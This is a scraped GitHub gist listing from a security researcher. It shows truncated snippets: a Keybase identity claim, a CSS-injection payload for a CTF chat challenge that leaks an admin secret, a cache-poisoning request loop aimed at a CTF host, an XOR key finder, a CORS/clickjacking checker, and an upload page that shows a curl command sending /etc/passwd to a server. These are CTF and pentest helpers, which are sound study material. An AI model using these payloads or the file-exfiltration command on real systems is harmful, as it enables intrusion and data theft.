I hereby claim:
- I am LuD1161 on github.
- I am aseemshrey (https://keybase.io/aseemshrey) on keybase.
- I have a public key whose fingerprint is 67B7 7F3A F3DA 6ACB 5662 6391 A7AE 09D5 4F0E C798
To claim this, I am signing this object:
Aseem Shrey LuD1161
👋
LuD1161
/ keybase.md
Created
February 7, 2017 07:38
Hi ~ This is a gist !
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # -*- coding: utf-8 -*- | |
| char_al_num = '0123456789abcdefghijklmnopqrstuvwxyz' | |
| char_Al = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' | |
| char_spl = '!"#$%&\'()*+,-./:;<=>?@^_`{|}~ ' | |
| char_Al += char_spl | |
| put_secret_in_chat = "/name leaker ] {color:blue; background:url(/room/3fa91dea-2fc6-4e0f-a614-8243c50e62d8/send?name=admin&msg=/secret abc; Domain=somecompany.co.uk);} " | |
| def generate_payload(new_char_returned_by_admin): |
LuD1161
/ catchat.js
Created
June 25, 2018 10:29
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Set name | |
| let color = ['brown', 'black', 'yellow', 'white', 'grey', 'red'][Math.floor(Math.random()*6)]; | |
| let breed = ['ragamuffin', 'persian', 'siamese', 'siberian', 'birman', 'bombay', 'ragdoll'][Math.floor(Math.random()*7)]; | |
| if (!localStorage.name) localStorage.name = color + '_' + breed; | |
| // Utility functions | |
| let cookie = (name) => (document.cookie.match(new RegExp(`(?:^|; )${name}=(.*?)(?:$|;)`)) || [])[1]; | |
| let esc = (str) => str.replace(/</g, '<').replace(/>/g, '>').replace(/"/g, '"').replace(/'/g, '''); | |
| // Sending messages |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # SSH Tunnelling | |
| https://www.digitalocean.com/community/tutorials/how-to-route-web-traffic-securely-without-a-vpn-using-a-socks-tunnel | |
| ssh -D 8123 -f -C -q -N sammy@example.com | |
| # For decompiling to source files from webpack's compiled bundle, if you have the map | |
| https://github.com/paazmaya/shuji or forked one here ( https://github.com/LuD1161/shuji ) | |
| To get the source map usually append .map at the end of .js urls like : | |
| https://company.com/app.b12fec8.js so map would be at https://company.com/app.b12fec8.js.map |
LuD1161
/ cors_and_clickjacking_checker.html
Created
July 24, 2018 12:24
cors_and_clickjacking_checker
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <html> | |
| <head> | |
| <meta charset="utf-8"/> | |
| <title>CORS and Clickjacking checker</title> | |
| <style> | |
| body { | |
| font-family: Arial; | |
| color: white; | |
| } |
LuD1161
/ findFile.py
Created
August 24, 2018 16:35
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| """ | |
| A horrible script, however gets things done ;) | |
| USE CASE : If file encrypted with simple xor | |
| Enter expected key, can be file format's hex | |
| It will automatically find the key based on that header | |
| And write out a new file out of it | |
| """ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from time import sleep | |
| import requests | |
| import webbrowser | |
| X_Forwarded_Host = 'my_server' | |
| while True: | |
| resp = requests.get("http://3fad5c9a76928974bc36ef08fb1dfa2c98e98740.hm.vulnerable.services/cdn/app.js", headers={'X-Forwarded-Host': X_Forwarded_Host}) | |
| print resp.headers | |
| sleep(0.5) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var token = null; | |
| Promise.all([ | |
| fetch('/api/movies').then(r=>r.json()), | |
| fetch(`//3fad5c9a76928974bc36ef08fb1dfa2c98e98740.hm.vulnerable.services/cdn/main.mst`).then(r=>r.text()), | |
| new Promise((resolve) => { | |
| if (window.loaded_recapcha === true) | |
| return resolve(); | |
| window.loaded_recapcha = resolve; | |
| }), |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <html> | |
| <head> | |
| <title>Upload your files</title> | |
| </head> | |
| <body> | |
| <h1> Make sure you've set the right permissions for your "uploads" directory i.e. chmod -R 777 uploads </h1> | |
| <h2>For curl command : curl -F "uploaded_file=@/etc/passwd" http://server_ip/path_to_this_script/upload.php </h2> | |
| <form enctype="multipart/form-data" method="POST"> | |
| <p>Upload your file</p> |
OlderNewer